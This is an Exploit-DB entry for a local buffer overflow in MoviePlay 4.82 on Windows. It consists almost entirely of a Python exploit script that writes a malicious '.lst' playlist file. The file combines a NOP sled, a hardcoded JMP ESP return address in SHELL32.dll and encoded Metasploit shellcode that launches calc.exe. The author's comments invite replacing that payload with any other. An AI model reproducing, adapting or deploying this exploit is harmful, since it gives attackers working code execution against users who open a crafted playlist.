MoviePlay 4.82 - '.lst' Local Buffer Overflow

EDB-ID:

16153

CVE:

N/A


Author:

sickness

Type:

local


Platform:

Windows

Date:

2011-02-11


#!/usr/bin/env python
# MoviePlay 4.82 (.lst) Buffer Overflow
# Author: sickness
# Download : http://www.softpedia.com/get/Multimedia/Video/Video-Players/MoviePlay.shtml
# Previous version exploit can be found here: http://www.exploit-db.com/exploits/4051/
# Tested : Windows XP Professional SP3 (EN) latest updates with IE8
# DATE   : 10/02/2011
###################################################################
# You might need to change the EIP address
# The payload can be replaced with whatever you want, there is enough space.
###################################################################

begin = "\x5b\x4d\x6f\x76\x69\x65\x50\x6c\x61\x79\x5d\x0d\x0a\x46\x69\x6c\x65\x4e\x61\x6d\x65\x30\x3d\x43\x3a\x5c"
junk = '\x90' * 1085
eip = '\xD7\x30\x9D\x7C'	# JMP ESP SHELL32.dll
nops = '\x90'*16

# msfpayload windows/exec CMD=calc.exe R | msfencode -a x86 -t c
sc = ("\xbe\x41\x9e\x4e\xd0\x33\xc9\xda\xd7\xd9\x74\x24\xf4\xb1\x33"
"\x58\x31\x70\x10\x83\xe8\xfc\x03\x31\x92\xac\x25\x4d\x42\xb9"
"\xc6\xad\x93\xda\x4f\x48\xa2\xc8\x34\x19\x97\xdc\x3f\x4f\x14"
"\x96\x12\x7b\xaf\xda\xba\x8c\x18\x50\x9d\xa3\x99\x54\x21\x6f"
"\x59\xf6\xdd\x6d\x8e\xd8\xdc\xbe\xc3\x19\x18\xa2\x2c\x4b\xf1"
"\xa9\x9f\x7c\x76\xef\x23\x7c\x58\x64\x1b\x06\xdd\xba\xe8\xbc"
"\xdc\xea\x41\xca\x97\x12\xe9\x94\x07\x23\x3e\xc7\x74\x6a\x4b"
"\x3c\x0e\x6d\x9d\x0c\xef\x5c\xe1\xc3\xce\x51\xec\x1a\x16\x55"
"\x0f\x69\x6c\xa6\xb2\x6a\xb7\xd5\x68\xfe\x2a\x7d\xfa\x58\x8f"
"\x7c\x2f\x3e\x44\x72\x84\x34\x02\x96\x1b\x98\x38\xa2\x90\x1f"
"\xef\x23\xe2\x3b\x2b\x68\xb0\x22\x6a\xd4\x17\x5a\x6c\xb0\xc8"
"\xfe\xe6\x52\x1c\x78\xa5\x38\xe3\x08\xd3\x05\xe3\x12\xdc\x25"
"\x8c\x23\x57\xaa\xcb\xbb\xb2\x8f\x24\xf6\x9f\xb9\xac\x5f\x4a"
"\xf8\xb0\x5f\xa0\x3e\xcd\xe3\x41\xbe\x2a\xfb\x23\xbb\x77\xbb"
"\xd8\xb1\xe8\x2e\xdf\x66\x08\x7b\xbc\xe9\x9a\xe7\x6d\x8c\x1a"
"\x8d\x71")

exploit = junk + eip + nops + sc
rest = '\x90'*(2000-len(exploit))
end="\x2e\x6d\x70\x33\x0d\x0a\x46\x69\x6c\x65\x4e\x61\x6d\x65\x31\x3d\x0d\x0a\x4e\x75\x6d\x46\x69\x6c\x65\x73\x3d\x31\x0d\x0a"

try:
	f = open("evil.lst","w");
	f.write(begin+exploit+rest+end)
	f.close()
	print "Done!"
except:
	print "Something went wront!"